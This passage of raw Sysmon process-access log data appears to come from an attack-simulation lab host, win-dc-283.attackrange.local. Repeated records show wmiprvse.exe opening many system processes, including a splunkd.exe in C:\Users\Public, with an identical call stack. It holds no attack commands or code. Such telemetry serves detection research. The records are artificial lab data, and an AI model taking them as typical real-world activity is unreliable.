Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029992Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029991Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029990Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029989Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029988Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029987Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029986Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029985Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029984Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029983Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029982Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029981Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029980Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029979Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029978Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029977Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029976Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029975Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029974Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:04:52.825{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029973Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 